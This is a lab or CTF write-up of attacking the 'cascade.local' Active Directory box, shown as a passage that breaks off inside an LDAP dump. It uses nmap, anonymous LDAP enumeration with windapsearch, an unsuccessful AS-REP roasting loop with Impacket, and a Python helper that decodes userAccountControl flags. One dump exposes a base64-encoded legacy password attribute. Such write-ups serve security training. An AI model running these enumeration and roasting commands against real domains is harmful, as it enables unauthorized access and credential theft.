Continuing my mastery of the AD journey.
We’ll start the way we always do — by running an nmap scan.
If you’ve read any of my previous articles, you already know there are certain things that immediately pop out.
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-01 19:15 -0500
Nmap scan report for 10.129.42.114
Host is up (0.035s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-02 00:15:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|2012|8.1 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (92%), Microsoft Windows Vista or Windows 7 (92%), Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-02T00:16:54
|_ start_date: 2026-03-01T23:59:04
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
|_clock-skew: -1s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.22 seconds
jbrown@Jabaris-MacBook-Pro cascade %
We can see LDAP running on ports 389 and 3268, SMB on 445, and WinRM on 5985.
These are going to be crucial for our enumeration.
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Host script results:
| smb2-time:
| date: 2026-03-02T00:16:54
|_ start_date: 2026-03-01T23:59:04
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
|_clock-skew: -1s
We can try using netexec to enumerate SMB, but it looks like guest/anonymous login isn’t permitted, since both attempts come back with STATUS_LOGON_FAILURE. (The Null Auth:True in the nxc banner refers to an SMB null session, which is a different thing from logging in as a user called anonymous.)
jbrown@Jabaris-MacBook-Pro cascade % nxc smb 10.129.42.114 -u anonymous -p ""
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [-] cascade.local\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro cascade % nxc smb 10.129.42.114 -u anonymous -p anonymous
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [-] cascade.local\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro cascade %
Since we had no luck with SMB, we can pivot.
LDAP is exposed on port 389, so we can try querying it directly using windapsearch to begin enumerating the domain.
If anonymous bind is allowed, it can hand us valuable information about the domain: the users, groups and computers enumerated below.
When SMB shuts the door, LDAP sometimes leaves a window open.
jbrown@Jabaris-MacBook-Pro windapsearch % ls
LICENSE README.md requirements.txt windapsearch_py2.py windapsearch.py
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
Alright — anonymous bind works.
That’s a good sign. This is looking promising.
If the directory is allowing anonymous queries, that means we can start pulling real information from the domain.
users:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 15 users:
cn: CascGuest
userPrincipalName: [email protected]
cn: ArkSvc
userPrincipalName: [email protected]
cn: Steve Smith
userPrincipalName: [email protected]
cn: Ryan Thompson
userPrincipalName: [email protected]
cn: Util
userPrincipalName: [email protected]
cn: James Wakefield
userPrincipalName: [email protected]
cn: Stephanie Hickson
userPrincipalName: [email protected]
cn: John Goodhand
userPrincipalName: [email protected]
cn: Adrian Turnbull
userPrincipalName: [email protected]
cn: Edward Crowe
userPrincipalName: [email protected]
cn: Ben Hanson
userPrincipalName: [email protected]
cn: David Burman
userPrincipalName: [email protected]
cn: BackupSvc
userPrincipalName: [email protected]
cn: Joseph Allen
userPrincipalName: [email protected]
cn: Ian Croft
userPrincipalName: [email protected]
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
groups:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -G
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD groups
[+] Found 38 groups:
cn: Users
distinguishedName: CN=Users,CN=Builtin,DC=cascade,DC=local
cn: Guests
distinguishedName: CN=Guests,CN=Builtin,DC=cascade,DC=local
cn: Remote Desktop Users
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=cascade,DC=local
cn: Network Configuration Operators
distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=cascade,DC=local
cn: Performance Monitor Users
distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=cascade,DC=local
cn: Performance Log Users
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=cascade,DC=local
cn: Distributed COM Users
distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=cascade,DC=local
cn: IIS_IUSRS
distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=cascade,DC=local
cn: Cryptographic Operators
distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=cascade,DC=local
cn: Event Log Readers
distinguishedName: CN=Event Log Readers,CN=Builtin,DC=cascade,DC=local
cn: Certificate Service DCOM Access
distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=cascade,DC=local
cn: Domain Computers
distinguishedName: CN=Domain Computers,CN=Users,DC=cascade,DC=local
cn: Cert Publishers
distinguishedName: CN=Cert Publishers,CN=Users,DC=cascade,DC=local
cn: Domain Users
distinguishedName: CN=Domain Users,CN=Users,DC=cascade,DC=local
cn: Domain Guests
distinguishedName: CN=Domain Guests,CN=Users,DC=cascade,DC=local
cn: Group Policy Creator Owners
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=cascade,DC=local
cn: RAS and IAS Servers
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=cascade,DC=local
cn: Pre-Windows 2000 Compatible Access
distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=cascade,DC=local
cn: Incoming Forest Trust Builders
distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=cascade,DC=local
cn: Windows Authorization Access Group
distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=cascade,DC=local
cn: Terminal Server License Servers
distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=cascade,DC=local
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=cascade,DC=local
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=cascade,DC=local
cn: Enterprise Read-only Domain Controllers
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=cascade,DC=local
cn: DnsAdmins
distinguishedName: CN=DnsAdmins,CN=Users,DC=cascade,DC=local
cn: DnsUpdateProxy
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=cascade,DC=local
cn: IT
distinguishedName: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Production
distinguishedName: CN=Production,OU=Groups,OU=UK,DC=cascade,DC=local
cn: HR
distinguishedName: CN=HR,OU=Groups,OU=UK,DC=cascade,DC=local
cn: AD Recycle Bin
distinguishedName: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Backup
distinguishedName: CN=Backup,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Temps
distinguishedName: CN=Temps,OU=Groups,OU=UK,DC=cascade,DC=local
cn: WinRMRemoteWMIUsers__
distinguishedName: CN=WinRMRemoteWMIUsers__,CN=Users,DC=cascade,DC=local
cn: Remote Management Users
distinguishedName: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Factory
distinguishedName: CN=Factory,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Finance
distinguishedName: CN=Finance,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Audit Share
distinguishedName: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
cn: Data Share
distinguishedName: CN=Data Share,OU=Groups,OU=UK,DC=cascade,DC=local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
computers:
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -C
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD computers
[+] Found 1 computers:
cn: CASC-DC1
operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1
dNSHostName: CASC-DC1.cascade.local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
unconstrained delegation:
If a computer account has unconstrained delegation enabled, any user who authenticates to that machine has a copy of their TGT cached in its memory. Whoever controls that host can potentially extract those tickets and impersonate the users to other services.
jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 --unconstrained-computers
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Attempting to enumerate all computer objects with unconstrained delegation
[+] Found 1 computers with unconstrained delegation:
CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local
dNSHostName: CASC-DC1.cascade.local
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
So that’s good to keep in mind — we may be able to leverage that later to grant ourselves a ticket. (Domain controllers are trusted for unconstrained delegation by default, so seeing CASC-DC1 in that list is expected rather than a misconfiguration.)
Now, since we were able to get an anonymous bind and pull a list of usernames, we can move into something more interesting.
A well-known attack: AS-REP Roasting.
The idea here is simple.
If a user has Kerberos pre-authentication disabled, we can request an AS-REP from the domain controller without knowing the password.
If pre-auth is not required, the KDC will return encrypted material tied to that user’s password — which we can then crack offline.
users.txt:
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
Next, we can use Impacket’s GetNPUsers script.
This will loop through our list of usernames and query Kerberos for accounts that have pre-authentication disabled.
If we’re lucky, the domain controller will return an AS-REP for one of the users.
jbrown@Jabaris-MacBook-Pro examples % while read p; do python3 GetNPUsers.py cascade.local/"$p" -request -no-pass -dc-ip 10.129.42.114 >> hash.txt; done < ../../../cascade/users.txt
jbrown@Jabaris-MacBook-Pro cascade % cat hash.txt
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for CascGuest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
jbrown@Jabaris-MacBook-Pro cascade %
Looks like no luck — no hashes returned.
The four accounts that came back with KDC_ERR_CLIENT_REVOKED (CascGuest, e.crowe, b.hanson and i.croft) were refused outright, which is what the KDC does for disabled, expired or locked-out accounts; every other user answered that pre-authentication is required.
That tells me pre-authentication is likely enabled across the board.
I might’ve jumped the gun a bit.
So instead of forcing the attack path, let’s go back to enumeration.
I already have the usernames, so now I can loop through each one and dig deeper.
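"Pre-authentication disabled" is just one bit of the userAccountControl attribute (0x400000, UF_DONT_REQUIRE_PREAUTH), and the same attribute explains the two error messages above: an account with the ACCOUNTDISABLE bit (0x2) gets KDC_ERR_CLIENT_REVOKED, everyone else gets the "doesn't have UF_DONT_REQUIRE_PREAUTH set" message. So the full attribute dumps can answer the roasting question without sending a single AS-REQ. The following Python is an added example, not part of the original post, windapsearch or Impacket: it parses records in windapsearch --full format, decodes userAccountControl and summarizes each account. The input text is a constructed sample that keeps only a few attributes of three of the accounts shown on this page.

```python
"""Decode userAccountControl and summarize windapsearch --full records (added example)."""
import re

# Selected ADS_USER_FLAG_ENUM bits; the two that decide an AS-REP roast are marked.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",           # KDC answers KDC_ERR_CLIENT_REVOKED
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",   # unconstrained delegation (set on DCs by default)
    0x400000: "DONT_REQUIRE_PREAUTH",     # the bit GetNPUsers is hunting for
}
UF_ACCOUNTDISABLE = 0x000002
UF_DONT_REQUIRE_PREAUTH = 0x400000


def decode_uac(value: int) -> list:
    """Names of the known bits set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_outcome(uac: int) -> str:
    """What an AS-REQ without pre-authentication data gets back for this account."""
    if uac & UF_ACCOUNTDISABLE:
        return "KDC_ERR_CLIENT_REVOKED"           # disabled: refused before pre-auth is even considered
    if uac & UF_DONT_REQUIRE_PREAUTH:
        return "AS-REP returned (roastable)"
    return "KDC_ERR_PREAUTH_REQUIRED"             # Impacket prints "doesn't have UF_DONT_REQUIRE_PREAUTH set"


_ATTR_LINE = re.compile(r"^([A-Za-z][\w-]*): (.*)$")


def parse_records(text: str) -> list:
    """Split windapsearch --full output into one dict per '[+] Using DN:' block.

    Every attribute maps to a list, because memberOf and dSCorePropagationData
    are multi-valued; tool status lines ([+], [*]) never match the attribute regex.
    """
    records, current = [], None
    for line in text.splitlines():
        if line.startswith("[+] Using DN: "):
            current = {"dn": [line[len("[+] Using DN: "):]]}
            records.append(current)
            continue
        match = _ATTR_LINE.match(line)
        if current is None or match is None:
            continue
        current.setdefault(match.group(1), []).append(match.group(2))
    return records


def summarize(record: dict) -> dict:
    """Flatten one parsed record into the fields an AD reviewer looks at first."""
    uac = int(record.get("userAccountControl", ["0"])[0])
    return {
        "sam": record.get("sAMAccountName", ["?"])[0],
        "flags": decode_uac(uac),
        "disabled": bool(uac & UF_ACCOUNTDISABLE),
        "asrep": asrep_outcome(uac),
        # first RDN value of each memberOf DN: "CN=IT,OU=Groups,..." -> "IT"
        "groups": [dn.split(",")[0].split("=", 1)[1] for dn in record.get("memberOf", [])],
        "logon_script": record.get("scriptPath", [None])[0],
    }


def summarize_all(text: str) -> dict:
    """sAMAccountName -> summary, for every record in the dump."""
    return {s["sam"]: s for s in map(summarize, parse_records(text))}


# Constructed sample in windapsearch --full format: three of the accounts from
# this page, trimmed to the attributes the summary uses.
SAMPLE_DUMP = """\
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "CascGuest"
[+] Using DN: CN=CascGuest,CN=Users,DC=cascade,DC=local
cn: CascGuest
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
userAccountControl: 66082
sAMAccountName: CascGuest
[*] Bye!
[+] Using DN: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
cn: ArkSvc
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
userAccountControl: 66048
sAMAccountName: arksvc
[*] Bye!
[+] Using DN: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
cn: Steve Smith
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
userAccountControl: 66048
scriptPath: MapAuditDrive.vbs
sAMAccountName: s.smith
[*] Bye!
"""

if __name__ == "__main__":
    for sam, info in summarize_all(SAMPLE_DUMP).items():
        print(f"{sam:<10} {info['asrep']:<28} groups={info['groups']} script={info['logon_script']}")
```

Feeding it the real loop output (the command below, redirected to a file) gives a one-line-per-user view of disabled state, group memberships and logon scripts, which is a quicker way to spot accounts like ArkSvc, with its Remote Management Users and AD Recycle Bin memberships, than scrolling through several hundred lines of attributes.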
jbrown@Jabaris-MacBook-Pro windapsearch % while read u; do python3 ./windapsearch.py -d cascade.local --dc-ip 10.129.42.114 -l "$u" --full; done < ../../cascade/users.txt
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "CascGuest"
[+] Using DN: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: CascGuest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109153140.0Z
whenChanged: 20200110160637.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local
uSNChanged: 45094
name: CascGuest
objectGUID: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: CascGuest
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200109175934.0Z
dSCorePropagationData: 20200109154857.0Z
dSCorePropagationData: 16010714223649.0Z
lastLogonTimestamp: 132230700642958462
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "arksvc"
[+] Using DN: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: ArkSvc
distinguishedName: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109161820.0Z
whenChanged: 20200323113833.0Z
displayName: ArkSvc
uSNCreated: 12799
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295021
name: ArkSvc
objectGUID: ELXj5FhFXUmr2tAqpnaTNA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132248055409887841
pwdLastSet: 132230603002172876
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: arksvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294371134322815
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "s.smith"
[+] Using DN: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247275952778272
lastLogoff: 0
lastLogon: 132247275990842339
scriptPath: MapAuditDrive.vbs
pwdLastSet: 132247150854857364
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUwQAAA==
accountExpires: 9223372036854775807
logonCount: 16
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109180813.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294366735115088
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "r.thompson"
[+] Using DN: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "util"
[+] Using DN: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Util
distinguishedName: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109194521.0Z
whenChanged: 20200128180947.0Z
displayName: Util
uSNCreated: 24650
uSNChanged: 245850
name: Util
objectGUID: GdAgZzaP8E6S7CzuIP8sag==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132247085871071226
pwdLastSet: 132233548311955855
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVwQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: util
sAMAccountType: 805306368
userPrincipalName: [email protected]
